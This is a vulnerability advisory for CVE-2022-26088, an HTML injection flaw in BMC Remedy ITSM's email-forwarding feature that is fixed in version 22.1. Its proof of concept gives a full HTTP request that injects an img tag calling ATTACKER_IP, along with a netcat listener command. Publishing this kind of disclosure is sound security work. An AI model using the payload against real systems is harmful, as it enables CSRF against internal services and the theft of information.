Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-26088: HTML Injection in BMC Remedy ITSM-Suite

An issue was discovered in BMC Remedy before 22.1. Email-based Incident Forwarding allows remote authenticated users to inject HTML (such as an SSRF payload) into the Activity Log by placing it in the To: field. This affects rendering that occurs upon a click in the “number of recipients” field. NOTE: the vendor’s position is that “no real impact is demonstrated.”

CVE
#csrf#vulnerability#web#linux#js#ssrf#auth#firefox

The application BMC Remedy allows users to forward incidents via mail from the web interface. It is possible to inject HTML into the “To” field of the mail editor. Afterwards the application shows in the activity log that the incident was forwarded to <X> recipients. By clicking on the number of recipients the injected HTML is loaded and executed.

Vendor description

“Remedy IT Service Management Suite (Remedy ITSM Suite) and BMC Helix ITSM service provide out of-the-box IT Information Library (ITIL) service support functionality. Remedy ITSM Suite and BMC Helix ITSM service streamline and automate the processes around IT service desk, asset management, and change management operations. It also enables you to link your business services to your IT infrastructure to help you manage the impact of technology changes on business and business changes on technology — in real time and into the future. In addition, you can understand and optimize the user experience, balance current and future infrastructure investments, and view potential impact on the business by using a real-time service model.”

Source: https://docs.bmc.com/docs/itsm91/home-608490971.html

Business recommendation

The vendor provides an updated version which should be installed immediately.

The vendor states that:

  1. We have done hardening in version 22.1.
  2. However, we do not agree with assigning the CVE to this vulnerability.
  3. As mentioned previously this is an informative vulnerability, and no real impact is demonstrated.

Nevertheless, this can be used to trigger actions on internal services via CSRF or exfiltrate information.

Vulnerability overview/description****1) HTML Injection (CVE-2022-26088)

An authenticated attacker who can forward incidents per email is able to inject a limited set of HTML tags. This is accomplished by inserting arbitrary content into the “To:” field of the email. There is a filtering mechanism that prevents the injection of many HTML tags, for example <script>, and it also removes event handlers. An attacker is able to insert an image tag with an arbitrary src URL.

After sending the email, an entry is appended into the activity log of the incident which states that $USER has sent an email to <X> recipients. Upon clicking on the number <X>, the injected HTML code is loaded and executed.

By inserting an <img> with an arbitrary “src” attribute, an attacker can force the user’s browser to make requests to his specified URL. This can be used to trigger actions on internal services via CSRF or exfiltrate information.

Proof of concept****1) HTML Injection (CVE-2022-26088)

When an incident is viewed, there is a button which allows forwarding the incident by mail. After entering a TO address and the body of the email, it can be sent by clicking on the send button.

The HTML injection can be performed by intercepting this request and changing the ‘Email.To.InternetEmail’ parameter. The modified request is:

PUT /rest/incident/worknote/SOME_INCIDENT_ID HTTP/1.1
Host: TARGET
Cookie: […]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
X-Xsrf-Token: SOME_TOKEN
Content-Length: ADAPT_AS_NEEDED
Te: trailers
Connection: close

{
  "worknote": "pentest",
  "access": true,
  "Email.From.Person": {
    "email": "SOME_SENDING_MAIL",
    "fullName": "Pentest - SEC Consult",
    "loginId": "USERNAME"
  },
  "Email.Subject": "SOME_SUBJECT",
  "Email.Body": "test2",
  "Email.To.InternetEmail": "<img src=http: //ATTACKER_IP:8001/>[email protected]",
  "workInfoType": 16000
}

The parameter Email.To.InternetEmail contains the payload. In this case an image tag containing the IP of the attacker was inserted:

"<img src=http: //LOCAL_IP:8001/>[email protected]"

The [email protected] is needed to pass the email validation step and example.test was used to prevent sending out real emails. After this step, the information that $USER has sent an email to 1 recipient will be appended in the activity log of this incident.

Now we start a local netcat listener with the command:

$ nc -vnlp 8001

Now we click on the number ‘1’ in the activity log and see that the browser issues a request to our ‘netcat’ instance. This confirms that the browser tries to load the image from the specified URL.

Vulnerable / tested versions

The following version has been tested:

  • 9.1.10 this corresponds to version 20.02 as stated at the following URL https://community.bmc.com/s/news/aA33n000000CmmSCAS/remedy-version-mapping

Vendor contact timeline

Solution

Upgrade to version 22.1 or later which can be downloaded at the vendor’s page:

https://www.bmc.com/support/resources/product-downloads.html

Workaround

None

Advisory URL

https://sec-consult.com/vulnerability-lab/

EOF Daniel Hirschberger / @2022

Interested to work with the experts of SEC Consult? Send us your application

Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices

Related news

BMC Remedy ITSM-Suite 9.1.10 / 20.02 HTML Injection

BMC Remedy ITSM-Suite version 9.1.10 (20.02 in new versioning scheme) suffers from an html injection vulnerability.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907